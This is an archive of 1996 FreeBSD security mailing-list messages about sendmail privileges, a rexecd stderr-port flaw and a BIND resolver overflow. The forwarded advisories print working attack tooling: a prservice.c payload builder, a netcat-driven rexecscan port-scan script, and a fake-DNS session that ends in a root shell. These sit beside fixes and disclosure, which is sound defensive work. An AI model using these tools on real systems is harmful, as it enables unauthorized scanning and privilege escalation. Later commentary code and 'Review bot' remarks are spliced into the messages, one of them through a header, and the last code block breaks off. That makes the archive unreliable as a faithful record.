> etc.
>
> No longer do you have to worry about whether they have root or not - in
> fact each user gets to be root! (in their own machine, of course ;) ) If
> they want to hack, get fancy, reboot, etc. - it's up to them - it's *their*
> system, not yours.
>
> If they blow out the virtual OS space because they gave their password out
> to a grommet or made a mistake, you simply run a utility which checks and
> repairs the virtual file system's partitions and refreshes the virtual
> 'environment's' OS from a template.

What you describe here is VM. IBM has been marketing this for its mainframes for about 25 years. You can IPL (boot) CMS, MVS, VSE, AIX [UNIX], UTS [also UNIX], MTS, or another VM operating system (technically VM is a control program [CP], not an operating system) in a virtual machine. Everything is virtualized, from memory, to SMP, to disks (called minidisks). Because of this virtualization of hardware there is a price to pay in performance and the amount of hardware required to support the environment. (IBM has implemented PR/SM, VM in microcode, and it is felt that IBM will be replacing VM with PR/SM at some future date.)

In theory, building such a beast would not require the modification of any operating system you wish to run under the control of the CP, except to improve overall system performance, e.g. tell the CP dispatcher of certain events within the virtual machine to help it decide whether to give cycles to another virtual machine. Since all devices are virtualized, you could limit what each virtual machine would have access to, e.g. a VM may have put its virtual ethernet interface into promiscuous mode where in fact the CP will not allow any sniffing.

Having worked in such an environment in a past life as an MVS systems programmer, this environment is a handy tool to have; however, in today's age of cheap hardware you may be better off with a number of FreeBSD boxes connected to an etherswitch.

Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it."

From owner-freebsd-security Mon Nov 18 21:22:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA16242 for security-outgoing; Mon, 18 Nov 1996 21:22:29 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA16236 for ; Mon, 18 Nov 1996 21:22:24 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id WAA04323; Mon, 18 Nov 1996 22:22:09 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id WAA00676; Mon, 18 Nov 1996 22:21:50 -0700 (MST) Date: Mon, 18 Nov 1996 22:21:49 -0700 (MST)
From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Poul-Henning Kamp cc: freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9172.848302243@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

All arguments about just how much of an MTA needs to be setuid and why it can/can't be that way in real/fake life aside, do people think what phk suggests would be a useful thing, either as a separate patch or in the base kernel? It is trivial to implement; took 10 minutes to hack together a limited version (i.e. uses names like net.inet.tcp.uidforport_25 because I didn't feel like creating a new level just for my hack, and all the ports aren't implemented).

The biggest problem I see to implementing such a thing is that I can't see a pretty way to make it fit into the sysctl mold without having 1024 lines, one for each port < 1024. Anyone have any ideas on how to do that nicely, or if 1024 lines is ok?

On Mon, 18 Nov 1996, Poul-Henning Kamp wrote:
> What we REALLY need, is a way for root, to hand out certain privileges.
>
> Imagine this:
>
> sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp`
> sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp`
> sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp`
> sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp`
>
> This means that users with UID smtp can bind to socket 25 (aka smtp),
> and so on. Now sendmail NEVER needs to be root.
>
> How's that for security ?
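The alternative the thread keeps returning to, "run as root just long enough to bind port 25, then setuid to smtp", done carefully, as an added example that is not code from the thread, from sendmail or from FreeBSD: it binds the listener first, then drops to the uid/gid passed in and verifies that root is really gone. The account name "smtp" in main() follows the thread's own `id -ur smtp`; the port, the loopback bind and the account are assumptions.

```c
#define _DEFAULT_SOURCE 1
#include <grp.h>
#include <netinet/in.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Bind and listen on a TCP port on the loopback address (an assumption made
 * here so the example never exposes a port). For a port below 1024 this is
 * the one step that needs root; the returned fd stays usable after the
 * process has given root up. Returns the fd or -1. */
int bind_listener(unsigned short port)
{
    struct sockaddr_in sin;
    int one = 1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
        return -1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sin.sin_port = htons(port);
    if (bind(fd, (struct sockaddr *)&sin, sizeof sin) < 0 || listen(fd, 16) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Give up root permanently. The order matters: supplementary groups first
 * (only root may change them), then the gid, then the uid, because once the
 * uid is unprivileged the group calls would fail and root's groups would
 * leak through. Afterwards confirm that the ids really changed and that
 * root cannot be regained. Returns 0 on success, -1 on failure or when
 * asked to "drop" to root. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return -1;
    if (getuid() == 0 && setgroups(1, &gid) != 0)
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    /* A real drop makes both of these fail with EPERM. */
    if (setuid(0) == 0 || seteuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    /* "smtp" is the unprivileged account assumed for the daemon; port 25 is
     * the one the thread says sendmail needs root for. */
    struct passwd *pw = getpwnam("smtp");
    int fd;

    if (pw == NULL) {
        fprintf(stderr, "no such user: smtp\n");
        return 1;
    }
    fd = bind_listener(25);
    if (fd < 0) {
        perror("bind_listener");
        return 1;
    }
    if (drop_privileges(pw->pw_uid, pw->pw_gid) != 0) {
        fprintf(stderr, "privilege drop failed; refusing to serve as root\n");
        return 1;
    }
    printf("listening on port 25 as uid %u, root given up\n", (unsigned)getuid());
    /* the accept() loop would follow here, running entirely unprivileged */
    close(fd);
    return 0;
}
```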
From owner-freebsd-security Mon Nov 18 21:47:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA17405 for security-outgoing; Mon, 18 Nov 1996 21:47:05 -0800 (PST) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA17400; Mon, 18 Nov 1996 21:47:03 -0800 (PST) Received: from escape.cs.ibank.ru (escape.cs.ibank.ru [194.58.131.150]) by who.cdrom.com (8.7.5/8.6.11) with ESMTP id VAA12573 ; Mon, 18 Nov 1996 21:45:59 -0800 (PST) Received: (from igor@localhost) by escape.cs.ibank.ru (8.8.3/8.8.3/Zynaps) id IAA14073; Tue, 19 Nov 1996 08:43:01 +0300 (MSK) From: Igor Vinokurov Message-Id: <199611190543.IAA14073@escape.cs.ibank.ru> Subject: sendmail_wrapper.c To: security@freebsd.org, isp@freebsd.org Date: Tue, 19 Nov 1996 08:43:00 +0300 (MSK) X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

re, Where can I get sendmail wrapper code which only accepts incoming calls and queues messages?

--
Igor Vinokurov

From owner-freebsd-security Tue Nov 19 00:26:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA22809 for security-outgoing; Tue, 19 Nov 1996 00:26:27 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA22804; Tue, 19 Nov 1996 00:26:23 -0800 (PST) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id RAA00452; Mon, 18 Nov 1996 17:23:50 +0100 (MET) To: Marc Slemko cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 08:22:54 MST." Date: Mon, 18 Nov 1996 17:23:49 +0100 Message-ID: <450.848334229@critter.tfs.com>
From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

In message , Marc Slemko writes:
>What does sendmail need to do WRT binding to ports that a webserver
>doesn't? Programs such as webservers work quite well with a parent
>process running as root that binds to the port and forks children running as
>some non-root uid to handle requests. Why couldn't (this part) of
>sendmail's problems be fixed the same way?

Sure, but I'd rather once and for all get rid of the root bit :-)

--
Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so.

From owner-freebsd-security Tue Nov 19 07:53:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA13600 for security-outgoing; Tue, 19 Nov 1996 07:53:45 -0800 (PST) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA13591; Tue, 19 Nov 1996 07:53:36 -0800 (PST) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.3/8.6.10) with ESMTP id HAA00979; Tue, 19 Nov 1996 07:53:31 -0800 (PST) Message-Id: <199611191553.HAA00979@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: security-officer@freebsd.org cc: freebsd-security@freebsd.org Subject: Futile rexecd holes Date: Tue, 19 Nov 1996 07:53:27 -0800
From: Cy Schubert Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This was sent to me from BUGTRAQ. It may be of interest to many of you. Regards, Phone: (250)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.3/8.6.10) with SMTP id AAA05071 for cy; Tue, 19 Nov 1996 00:58:45 -0800 (PST) X-UIDL: 848412018.004 Resent-From: Cy Schubert - ITSD Open Systems Group Resent-Message-Id: <199611190858.AAA05071@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.3/8.6.10) with SMTP id AAA05221 for ; Tue, 19 Nov 1996 00:58:43 -0800 (PST) Received: from brimstone.netspace.org by orca.gov.bc.ca (5.4R3.10/200.1.1.4) id AA18528; Tue, 19 Nov 1996 00:58:41 -0800 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <25554-2781>; Tue, 19 Nov 1996 03:52:26 -0500 Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id DAA10692; Tue, 19 Nov 1996 03:44:30 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 1436340 for BUGTRAQ@NETSPACE.ORG; Tue, 19 Nov 1996 03:35:08 -0500 Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id DAA09363 for ; Tue, 19 Nov 1996 03:29:31 -0500 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from dhp.com (dhp.com [199.245.105.1]) by netspace.org (8.8.2/8.8.2) with ESMTP id XAA15996 for ; Mon, 18 Nov 1996 23:23:20 -0500 Received: (from jaeger@localhost) by dhp.com (8.8.2/8.6.12) id XAA01206; Mon, 18 Nov 1996 23:24:42 -0500 Mime-Version: 1.0 Content-Type: 
TEXT/PLAIN; charset=US-ASCII Approved-By: jaeger Message-Id: Date: Mon, 18 Nov 1996 23:24:42 -0500 Reply-To: jaeger Sender: Bugtraq List 
From: jaeger Subject: Futile rexecd holes X-To: deraadt@openbsd.org To: Multiple recipients of list BUGTRAQ Resent-To: cy@uumail.gov.bc.ca Resent-Date: Tue, 19 Nov 96 00:58:45 -0800 Resent-XMts: smtp

Vulnerability: Rexecd allows redirection of the stderr stream to an arbitrary port on the client machine. This stream is opened by rexecd before authentication of the user.

Vulnerable: All systems with BSD-based networking including FreeBSD, OpenBSD, NetBSD, BSDI BSD/OS, Solaris 2, OSF/1, Ultrix, Linux.

Background: Rshd and rexecd can output stderr by opening a socket from the server machine to the client machine which is accepted by the rsh or rexec client. The rsh client opens the initial connection from a privileged port, rshd responds from a privileged port, and redirects the connection to a privileged port on the client machine. The trust model is preserved because this whole process is controlled by the setuid program rsh on the client machine. Exec is fundamentally similar to the shell service except that instead of a remote and local username being transmitted (for .rhosts and hosts.equiv authentication only), a username and password is transmitted, and the whole exchange uses unprivileged ports.

Discussion: Because rexec uses unprivileged ports for the whole process, any user can send a request to a rexecd requesting connection of the stderr stream to an arbitrary port on the client machine. Since the client is unprivileged, there is no possibility for the legitimate stderr stream to be destined for a privileged port. In addition, spoofing techniques could allow the client to direct the stderr stream towards an arbitrary host as well as an arbitrary port, possibly exploiting a given trust model. Since rexecd terminates if the stderr port can't be connected to, and the port can be specified, rexecd can be used to easily scan the client host from the server host. The included script "rexecscan" demonstrates this.
Repeat-By:

begin prservice.c

    /* modified by jaeger 12Nov1996.  Duplicated slack coding style.
       now takes
           port locuser remuser [cmd]
           port remuser passwd [cmd]
       where port is the dst port you wish the stderr socket to connect to
       from the server to the client machine.

       generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
       rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.
       args: locuser remuser [cmd]
             remuser passwd [cmd]
       cmd defaults to "pwd".  ... whatever.  _H*/

    /* The archive stripped the header name from the original #include;
       these are the headers the code below needs. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* change if you like; "id" is a good one for figuring out if you won too */
    static char cmd[] = "pwd";
    static char buf[256];

    int main(int argc, char *argv[])
    {
        int x;
        int y = 0;
        char *p;
        char *q;

        p = buf;
        memset(buf, 0, 256);
        if (!argv[1]) goto wrong;
        x = strlen(argv[1]);
        memcpy(p, argv[1], x);          /* port plus null */
        x++; p += x; y += x;
        if (!argv[2]) goto wrong;
        x = strlen(argv[2]);
        memcpy(p, argv[2], x);          /* second arg plus null */
        x++; p += x; y += x;
        if (!argv[3]) goto wrong;
        x = strlen(argv[3]);
        memcpy(p, argv[3], x);          /* third arg plus null */
        x++; p += x; y += x;
        q = cmd;
        if (argv[4]) q = argv[4];
        x = strlen(q);                  /* not checked -- bfd */
        memcpy(p, q, x);                /* the command, plus final null */
        x++; p += x; y += x;
        memcpy(p, "\n", 1);             /* and a newline, so it goes */
        y++;
        write(1, buf, y);               /* zot! */
        exit(0);
    wrong:
        fprintf(stderr, "%s: port user passwd [cmd]\n", argv[0]);
        exit(1);
    }

end prservice.c

begin rexecscan

    #!/bin/sh
    # Dumb script to demonstrate scanning with rexecd
    # jaeger, 12Nov1996

    # Path to netcat
    NC=nc
    # Path to prservice program
    PRS=./prservice
    # Port to scan to
    MAX=1024

    TARGET=$1
    USER=$2
    PASSWORD=$3
    PORT=1

    if [ $# -ne 3 ]; then
        echo "$0 target user password"
        exit 1
    fi

    while [ $PORT -lt $MAX ]; do
        $PRS $PORT $USER $PASSWORD "echo $PORT open" | $NC $TARGET 512
        PORT=`expr $PORT + 1`
    done
    exit 0

end rexecscan

Suggested Fix: The rexecd should check the specified return port ("port") to make sure it is nonprivileged, and not open the stderr stream until authentication is complete. Similar fixes for rshd are left as an exercise for the reader.

*** rexecd.c.dist Mon Nov 11 11:32:23 1996 - --- rexecd.c Thu Nov 14 01:55:17 1996 *************** *** 151,168 **** port = port * 10 + c - '0'; } (void) alarm(0); ! if (port != 0) { ! s = socket(AF_INET, SOCK_STREAM, 0); ! if (s < 0) ! exit(1); ! if (bind(s, (struct sockaddr *)&asin, sizeof (asin)) < 0) ! exit(1); ! (void) alarm(60); ! fromp->sin_port = htons(port); ! if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) ! exit(1); ! (void) alarm(0); ! } getstr(user, sizeof(user), "username"); getstr(pass, sizeof(pass), "password"); getstr(cmdbuf, sizeof(cmdbuf), "command"); - --- 151,157 ---- port = port * 10 + c - '0'; } (void) alarm(0); !
getstr(user, sizeof(user), "username"); getstr(pass, sizeof(pass), "password"); getstr(cmdbuf, sizeof(cmdbuf), "command"); *************** *** 215,220 **** - --- 204,227 ---- error("No remote directory.\n"); exit(1); } + + if (port != 0) { + if ((port != 0) && (port < IPPORT_RESERVED)) { + syslog(LOG_ERR, "client stderr port in reserved range\n"); + exit(1); + } + s = socket(AF_INET, SOCK_STREAM, 0); + if (s < 0) + exit(1); + if (bind(s, (struct sockaddr *)&asin, sizeof (asin)) < 0) + exit(1); + (void) alarm(60); + fromp->sin_port = htons(port); + if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) + exit(1); + (void) alarm(0); + } + (void) write(2, "\0", 1); if (port) { (void) pipe(pv); *************** *** 255,260 **** - --- 262,268 ---- (void) close(s); (void)close(pv[0]); dup2(pv[1], 2); } + if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; if (f > 2) ------- End of Forwarded Message From owner-freebsd-security Tue Nov 19 10:06:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21110 for security-outgoing; Tue, 19 Nov 1996 10:06:36 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-143.rdcy01.pacbell.net [206.170.5.143]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21105; Tue, 19 Nov 1996 10:06:30 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id KAA18076; Tue, 19 Nov 1996 10:05:49 -0800 (PST) Message-Id: <199611191805.KAA18076@precipice.shockwave.com> To: cschuber@uumail.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 1996 07:53:27 PST." <199611191553.HAA00979@cwsys.cwent.com> Date: Tue, 19 Nov 1996 10:05:49 -0800 
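Review bot: in the second hunk (`*** 215,220 ****` / `--- 204,227 ----`) the added guard `if (port != 0) { if ((port != 0) && (port < IPPORT_RESERVED))` repeats the `port != 0` test the enclosing `if` already made; the inner condition can be just `port < IPPORT_RESERVED`. The guard also bounds only the low end: `port` is accumulated from client-supplied digits and then truncated by `htons(port)` on the line `fromp->sin_port = htons(port);`, so a value above 65535 wraps to a different port without ever hitting the reserved-range check, and a `port > 65535` rejection belongs beside the reserved-range test. Moving the socket/bind/connect block down past the `error("No remote directory.\n")` context does place it after the `getstr()` reads of username and password shown in the first hunk, which is the point of the fix.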
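Review bot: the third hunk (`*** 255,260 ****` / `--- 262,268 ----`) adds only an empty `+` line before `if (*pwd->pw_shell == '\0')`; it is a whitespace-only change unrelated to the stderr-port fix and should be dropped so the patch stays minimal and easy to audit.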
From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Thanks for the heads up, I've just made similar patches to -current and requested their incorporation into both release branches. This fix will not make 2.1.6, but will make the 2.1.6 "service pack update" (hah) and 2.2.

Since FreeBSD ships with rexecd disabled, I don't consider this a critical issue, however we will cut an SA in the next week or so (if I ever have a free moment again).

Paul

From owner-freebsd-security Tue Nov 19 10:16:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21660 for security-outgoing; Tue, 19 Nov 1996 10:16:39 -0800 (PST) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21653; Tue, 19 Nov 1996 10:16:36 -0800 (PST) Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.3/8.6.10) with SMTP id KAA06551; Tue, 19 Nov 1996 10:16:19 -0800 (PST)
From: Cy Schubert - ITSD Open Systems Group Message-Id: <199611191816.KAA06551@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@orca.gov.bc.ca X-Mailer: DXmail To: Paul Traina cc: cschuber@orca.gov.bc.ca, security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 96 10:05:49 PST." <199611191805.KAA18076@precipice.shockwave.com> Date: Tue, 19 Nov 96 10:16:18 -0800 X-Mts: smtp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

This is the first I've heard of a "service pack update." What is a "service pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT (Program Update Tape)? How does one get a "service pack update?"

Regards, Phone: (250)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it."

> Thanks for the heads up, I've just made similar patches to -current and
> requested their incorporation into both release branches. This fix will
> not make 2.1.6, but will make the 2.1.6 "service pack update" (hah) and
> 2.2.
>
> Since FreeBSD ships with rexecd disabled, I don't consider this a critical
> issue, however we will cut an SA in the next week or so (if I ever have a
> free moment again).
> > Paul From owner-freebsd-security Tue Nov 19 10:33:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA22797 for security-outgoing; Tue, 19 Nov 1996 10:33:45 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-143.rdcy01.pacbell.net [206.170.5.143]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA22772; Tue, 19 Nov 1996 10:33:31 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id KAA18369; Tue, 19 Nov 1996 10:32:45 -0800 (PST) Message-Id: <199611191832.KAA18369@precipice.shockwave.com> To: cschuber@orca.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 1996 10:16:18 PST." <199611191816.KAA06551@passer.osg.gov.bc.ca> Date: Tue, 19 Nov 1996 10:32:45 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk 
From: Cy Schubert - ITSD Open Systems Group
Subject: Re: Futile rexecd holes

  This is the first I've heard of a "service pack update." What is a "service pack update?" Is it similar in concept to Sun's SunSolve CDROM or IBM's PUT (Program Update Tape)? How does one get a "service pack update?"

Microsoft released a bunch of critical bugfixes for W95 and called it "Service Pack Update 1". It's a bad joke for what we're planning to call 2.1.6a (sigh).

From owner-freebsd-security Tue Nov 19 13:35:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA07913 for security-outgoing; Tue, 19 Nov 1996 13:35:37 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA07870; Tue, 19 Nov 1996 13:35:25 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id QAA02013; Tue, 19 Nov 1996 16:34:26 -0500 Date: Tue, 19 Nov 1996 15:34:24 -0600 (CST)
From: "S(pork)" X-Sender: spork@super-g.inch.com To: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Serious BIND resolver problem. (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

From your friendly neighborhood paranoia victim comes yet another loaded question...

I got this little advisory (thankfully without an exploit) today, and it's got me all worried. It's a problem in the whole gethostbyname call that allows (supposedly) local and remote users to gain root access using a variety of programs that rely on the gethostbyname call. So I downloaded BIND-4.9.3-REL which fixes all of this; and then I read the README in the BSD directory, got thoroughly confused, and posted my root password to #hack on irc. (kidding).

Now this does not appear to be a simple feat (hence my posting to -questions and -security; security people can look at it and laugh, and questions can tell me all about "diff-ing my source tree" and "manually updating includes (which you may or may not have to do)"). So my question is this; could anyone who's already updated this give me some advice or some pointers to this procedure?

The site carrying 4.9.3-REL is over at: ftp.vix.com/pub/bind/release

Thanks All,
Charles

"I may dance like a computer professional, but I rock like Molly Hatchet."

---------- Forwarded message ----------
Date: Mon, 18 Nov 1996 22:54:03 -0700
From: Oliver Friedrichs
To: Multiple recipients of list BUGTRAQ
Subject: Serious BIND resolver problem.

###### ## ## ###### ## ### ## ## ###### ## # ## ## ## ## ### ## ###### . ## ## . ###### .

Secure Networks Inc.
Security Advisory
November 18, 1996

Vulnerability in Unchecked DNS Data.

In research for our upcoming network auditing tool, we have uncovered a serious problem present in implementations of BIND which trust invalid data sent to them. This vulnerability specifically applies to hostname to address resolution and can result in local and remote users obtaining root privileges. It is recommended that security conscious users upgrade to the latest version of the BIND resolver immediately. Information on obtaining the latest official release is provided at the end of this message.

Technical Details
~~~~~~~~~~~~~~~~~

When a standard hostname lookup is performed on internet connected systems, the resulting address should be 4 bytes (forgetting about IPv6 for now). Assuming that the address will always be 4 bytes, many privileged and unprivileged programs (including network daemons) trust the address length field which is returned from gethostbyname() in the hostent structure. By trusting the length field returned by DNS to be 4 bytes, the program then copies the address into a 4 byte address variable.

The vulnerability exists due to the fact that we can specify the size of IP address data within the DNS packet ourselves. By specifying a size larger than 4 bytes, an overflow occurs, as the program attempts to copy the data into the 4 byte structure it has allocated to store the address.

One example of this vulnerability occurs in rcmd.c, the standard BSD library routine which is used by rsh and rlogin to remotely connect to systems. Note that the code itself is not faulty, however the resolver implementation is. Example code follows:

    hp = gethostbyname(*ahost);
    if (hp == NULL) {
        herror(*ahost);
        return (-1);
    }
    *ahost = hp->h_name;
    .
    .
    .
    bzero(&sin, sizeof sin);
    sin.sin_len = sizeof(struct sockaddr_in);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = rport;
    bcopy(hp->h_addr_list[0], &sin.sin_addr, hp->h_length);

In this example, we copy hp->h_length amount of data into the address variable of a sockaddr_in structure, which is 4 bytes. The hp->h_length variable is taken directly from the DNS reply packet. If we now look at how rcmd() declares its variables, and after looking through rlogin with a debugger, we can determine that this is a dangerous situation.

    int
    rcmd(ahost, rport, locuser, remuser, cmd, fd2p)
        char **ahost;
        u_short rport;
        const char *locuser, *remuser, *cmd;
        int *fd2p;
    {
        struct hostent *hp;
        struct sockaddr_in sin, from;
        fd_set reads;

On further testing, and implementation of exploitation code, we can verify that this is indeed possible via the rlogin service. In order to exploit the problem, we first start a program to send fake DNS replies.

    [root@ariel] [Dec 31 1969 11:59:59pm] [~]% ./dnsfake
    oakmont.secnet.com(4732)->idoru.secnet.com(53) : lookup: random-domain.com (1:1)
    sent packet fake reply: 270 bytes
    idoru.secnet.com(53)->oakmont.secnet.com(4732) : reply: random-domain.com (1:1)

We then cause rcmd() within rlogin to do a host lookup and respond with our false data.

    [oliver@oakmont] [Dec 31 1969 11:58:59pm] [~]% whoami
    oliver
    [oliver@oakmont] [Jan 01 1970 00:00:01am] [~]% rlogin random-domain.com
    random-domain.com: Connection refused
    # whoami
    root
    #

Impact
~~~~~~

By checking common BSD sources, we can see that over 20 local programs are vulnerable to this attack, and possibly 2 remote daemons. The possibility of exploiting local programs may seem insignificant, however if one considers an attacker somewhere on the internet intercepting DNS lookups, and inserting their own replies, it isn't. There is a real threat of passive attacks present here, whereby any user on a network running any of these programs can be a victim.
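The length check that the advisory's callers were relying on the resolver to have done, as an added example that is not part of the SNI advisory or of BSD libc. It assumes a caller that wants an AF_INET sockaddr_in and refuses any hostent whose address family or h_length does not match struct in_addr, and it exercises the check on two hand-built hostent structures: a normal 4-byte answer and a constructed 64-byte one standing in for a forged reply. The names hostent_to_sockaddr_in, accepts_valid_answer and rejects_oversized_answer are mine; sin_len, which the rcmd.c fragment sets, is left out so the code also builds on systems whose sockaddr_in lacks it. The advisory's real fix is a corrected resolver; this is the belt-and-braces check a caller can keep regardless.

```c
/* Added example, not from the SNI advisory or BSD libc: validate a
 * struct hostent before copying its address into a sockaddr_in, instead
 * of trusting h_length the way rcmd.c's bcopy() does. */
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>

/* Return 0 and fill *sin on success; -1 if the hostent is not a sane
 * AF_INET answer (no address, wrong family, or wrong length).  The copy
 * is always sizeof(struct in_addr), never hp->h_length. */
int hostent_to_sockaddr_in(const struct hostent *hp, unsigned short port,
                           struct sockaddr_in *sin)
{
    if (hp == NULL || hp->h_addr_list == NULL || hp->h_addr_list[0] == NULL)
        return -1;
    if (hp->h_addrtype != AF_INET)
        return -1;
    /* This is the check the advisory's callers skipped: on a vulnerable
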